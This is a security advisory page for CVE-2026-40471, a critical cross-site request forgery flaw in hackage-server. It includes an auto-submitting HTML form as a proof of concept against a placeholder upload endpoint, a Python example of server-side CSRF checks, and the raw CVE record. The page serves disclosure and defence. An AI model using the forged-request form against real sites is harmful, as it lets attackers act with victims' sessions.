Security Vulnerability Report
CVE-2026-40471 CVSS 9.6 CRITICAL

CVE-2026-40471

Published: 2026-04-23 16:16:26
Last Modified: 2026-04-24 14:41:56
Source: 74b3a70d-cca6-4d34-9789-e83b222ae3be

Description

hackage-server lacked Cross-Site Request Forgery (CSRF) protection across its endpoints. Scripts on foreign sites could trigger requests to a hackage-server instance, possibly abusing latent credentials (the victim's session cookie, which the browser attaches to the forged request automatically) to upload packages or perform other administrative actions. Some unauthenticated actions could also be abused (e.g. creating new user accounts).

CVSS Details

CVSS Score: 9.6
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L

Reading the vector: PR:N (no privileges required) together with UI:R (the victim must load the attacker's page) is the usual CSRF profile, since the attacker needs no credentials of their own when the victim's browser supplies them. S:C reflects that a foreign site drives actions inside the hackage-server security scope.

Configurations (Affected Products)

No configuration data available.

hackage-server (see the official advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- PoC for CVE-2026-40471: CSRF on hackage-server.
     "target-server", the /upload path and the "package" field are placeholders
     from the original PoC, not the real hackage-server upload endpoint. -->
<html>
  <body>
    <!-- The form auto-submits. Because the server checked neither a CSRF token
         nor the Origin header, the victim's browser attaches its hackage session
         cookie and the request is processed as the victim.
         Note: a hidden text input only carries the string "malicious.tgz"; a real
         package upload would need a multipart/form-data body matching the target
         endpoint. -->
    <form action="http://target-server/upload" method="POST">
      <input type="hidden" name="package" value="malicious.tgz" />
      <input type="submit" value="Click Me" />
    </form>
    <script>
      // Auto-trigger submission as soon as the page loads
      document.forms[0].submit();
    </script>
  </body>
</html>
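The server-side check that the description says was missing, and that would reject the auto-submitting form above, as an added example. This is not hackage-server's code (the project is written in Haskell); the allowed origin `https://hackage.example`, the endpoint paths and the form field name `csrf_token` are assumptions chosen for illustration, and all requests it runs over are constructed inline. It layers an Origin/Sec-Fetch-Site check, which also covers unauthenticated endpoints such as account creation, under a synchronizer-token comparison for authenticated requests.

```python
"""Server-side CSRF guard of the kind hackage-server lacked (added example,
not project code).  The allowed origin, endpoint paths and the token field
name below are assumptions chosen for illustration."""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# Assumption: the service is only ever served from this origin.
ALLOWED_ORIGINS = {"https://hackage.example"}
TOKEN_FIELD = "csrf_token"          # assumed name of the synchronizer-token form field
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


@dataclass
class Request:
    """Minimal view of an incoming request; every instance below is constructed."""
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)  # keys lower-cased
    form: Dict[str, str] = field(default_factory=dict)     # parsed body fields
    session_token: Optional[str] = None  # CSRF token bound to the session cookie, if logged in


def new_session_token() -> str:
    """Mint a per-session synchronizer token; store it server-side and embed it in forms."""
    return secrets.token_urlsafe(32)


def csrf_verdict(req: Request) -> Tuple[bool, str]:
    """Decide whether a state-changing request may proceed; returns (allowed, reason).

    Defences are layered as the OWASP CSRF cheat sheet recommends:
      1. Fetch metadata (Sec-Fetch-Site) and the Origin/Referer header must show the
         request is same-origin.  This layer also protects unauthenticated endpoints
         such as account creation, where there is no session token to compare.
      2. For authenticated requests the token in the body must equal the token
         bound to the session, compared in constant time.
    Cookie presence is deliberately not treated as evidence of intent: the browser
    attaches it to the attacker's form post exactly as it would to a legitimate one.
    """
    if req.method.upper() in SAFE_METHODS:
        return True, "safe method"

    sfs = req.headers.get("sec-fetch-site")
    if sfs is not None and sfs not in ("same-origin", "none"):
        return False, f"Sec-Fetch-Site={sfs}"

    source = req.headers.get("origin") or req.headers.get("referer")
    if source is None:
        return False, "no Origin/Referer header"      # cannot prove same-origin: fail closed
    parts = urlsplit(source)
    origin = f"{parts.scheme}://{parts.netloc}"     # "Origin: null" yields "://" and is rejected
    if origin not in ALLOWED_ORIGINS:
        return False, f"cross-site origin {origin}"

    if req.session_token is not None:
        submitted = req.form.get(TOKEN_FIELD, "")
        if not hmac.compare_digest(submitted.encode(), req.session_token.encode()):
            return False, "missing or wrong CSRF token"

    return True, "same-origin request with valid token"


def demo() -> Dict[str, Tuple[bool, str]]:
    """Run the guard over constructed requests: the auto-submitting PoC form,
    an unauthenticated cross-site account creation, and two legitimate posts."""
    tok = new_session_token()
    cases = {
        # What the PoC form produces in a modern browser; the victim's cookie rides along.
        "poc_upload": Request("POST", "/upload",
                              {"origin": "https://attacker.example",
                               "sec-fetch-site": "cross-site",
                               "cookie": "session=victim"},
                              {"package": "malicious.tgz"}, session_token=tok),
        # No session at all, so only the origin layer can stop it.
        "cross_site_signup": Request("POST", "/users/register",
                                     {"origin": "https://attacker.example"},
                                     {"username": "mallory"}),
        # Same-origin form that carries the session's token.
        "legit_upload": Request("POST", "/upload",
                                {"origin": "https://hackage.example",
                                 "sec-fetch-site": "same-origin"},
                                {"package": "good.tgz", TOKEN_FIELD: tok}, session_token=tok),
        # Older browser: no fetch metadata, but Origin and token still check out.
        "legacy_browser_upload": Request("POST", "/upload",
                                         {"origin": "https://hackage.example"},
                                         {"package": "good.tgz", TOKEN_FIELD: tok}, session_token=tok),
    }
    return {name: csrf_verdict(r) for name, r in cases.items()}


if __name__ == "__main__":
    for name, (ok, why) in demo().items():
        print(f"{name:24s} {'ALLOW' if ok else 'BLOCK':5s} {why}")
```

Running the module blocks the PoC upload and the cross-site signup and allows the two same-origin uploads. The origin layer is what matters for the unauthenticated account-creation case in the description: a token scheme alone has nothing to compare against there, while a `Sec-Fetch-Site: cross-site` or foreign `Origin` header still identifies the forged request.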

References

https://osv.dev/vulnerability/HSEC-2026-0002 (advisory HSEC-2026-0002 on OSV)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-40471",
    "sourceIdentifier": "74b3a70d-cca6-4d34-9789-e83b222ae3be",
    "published": "2026-04-23T16:16:25.640",
    "lastModified": "2026-04-24T14:41:55.890",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "hackage-server lacked Cross-Site Request Forgery (CSRF) protection across its endpoints. Scripts on foreign sites could trigger requests to hackage server, possibly abusing latent credentials to upload packages or perform other administrative actions. Some unauthenticated actions could also be abused (e.g. creating new user accounts)."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "74b3a70d-cca6-4d34-9789-e83b222ae3be",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L",
            "baseScore": 9.6,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "74b3a70d-cca6-4d34-9789-e83b222ae3be",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-352"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://osv.dev/vulnerability/HSEC-2026-0002",
        "source": "74b3a70d-cca6-4d34-9789-e83b222ae3be"
      }
    ]
  }
}